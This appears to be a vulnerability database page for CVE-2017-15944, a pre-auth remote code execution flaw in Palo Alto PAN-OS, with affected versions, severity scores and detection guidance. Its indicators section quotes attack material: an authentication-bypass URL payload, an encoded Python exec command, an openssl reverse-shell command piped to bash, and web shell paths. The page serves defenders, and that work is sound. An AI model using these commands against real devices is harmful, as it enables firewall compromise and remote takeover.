cbcvebase.
CVE-2017-15944
published 2017-12-11

CVE-2017-15944: Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via…

PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-09-08
Exploited in the wild
EPSS
98.34%
99.9th percentile
Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.

Affected

5 ranges
VendorProductVersion rangeFixed in
paloaltopan-os
paloaltonetworkspan-os< 6.1.196.1.19
paloaltonetworkspan-os>= 7.0.0 < 7.0.197.0.19
paloaltonetworkspan-os>= 7.1.0 < 7.1.147.1.14
paloaltonetworkspan-os>= 8.0.0 < 8.0.68.0.6

Detection & IOCsextracted from sources · hover to see the quote

url/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";
path/esp/cms_changeDeviceContext.esp
path/php/utils/debug.php
path/php/utils/router.php
path/var/appweb/htdocs/api/c.php
path/api/c.php
path/opt/pancfg/mgmt/logdb/traffic/1/
path/opt/pancfg/session/pan/user_tmp/
cookiePHPSESSID=hacked
command* -print -exec python -c exec("[base64 code..]".decode("base64")) ;
command* -print -exec bash -c openssl${IFS}s_client${IFS}-quiet${IFS}-connect${IFS}#{cbhost}:#{cbport}|bash ;
path/php/utils/router.php/Administrator.get
otherhttp.favicon.hash:-631559155
  • Detect the authentication bypass trigger: monitor HTTP GET requests to /esp/cms_changeDeviceContext.esp containing the session-corruption payload pattern (single-quote + ";user|s.) in the device parameter.
  • Detect exploitation of the XML injection / directory creation step: monitor HTTP POST requests to /php/utils/router.php containing 'Administrator.get' with 'async-mode' and directory traversal sequences (../../) in the JSON body.
  • Alert on creation of or HTTP access to the web shell path /var/appweb/htdocs/api/c.php or /api/c.php on PAN-OS management interfaces.
  • Alert on creation of the SUID root binary /bin/x on PAN-OS devices, which is dropped by the exploit payload.
  • Monitor the cron-executed scripts /usr/local/bin/genindex_batch.sh and /usr/local/bin/genindex.sh for anomalous directory names under /opt/pancfg/mgmt/logdb/ containing shell metacharacters or -exec arguments, which indicate exploitation of the command injection in the cron script.
  • Use Palo Alto Networks vulnerability signatures #40483 and #40484 (content update 756) applied to firewall rules protecting the management interface as an interim detection/mitigation control.
  • Identify exposed PAN-OS management interfaces via Shodan using favicon hash -631559155 or FOFA icon_hash=-631559155.
  • Detect the Metasploit module's reverse TLS staging callback: an outbound openssl s_client connection from the PAN-OS management plane to an external host, piped to bash.
  • ·PAN-OS 8.0 (before 8.0.6) is patched but was NOT remotely exploitable by an unauthenticated user via this specific vulnerability chain; the unauthenticated pre-auth RCE path applies to PAN-OS 6.1.18 and earlier, 7.0.18 and earlier, and 7.1.13 and earlier.
  • ·The exploit chain requires the web management interface to be reachable by the attacker; Palo Alto Networks recommends not exposing the management interface to the internet, which significantly reduces attack surface.
  • ·The cron-based command injection stage fires every 15 minutes; exploitation can take up to 20 minutes end-to-end, so detection must account for delayed payload execution rather than immediate shell activity.
  • ·The authentication bypass does NOT produce a fully valid logged-in session; most PHP scripts will still fail, but the panAuthCheck directive in the web server is bypassed, allowing access to specific protected PHP endpoints.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.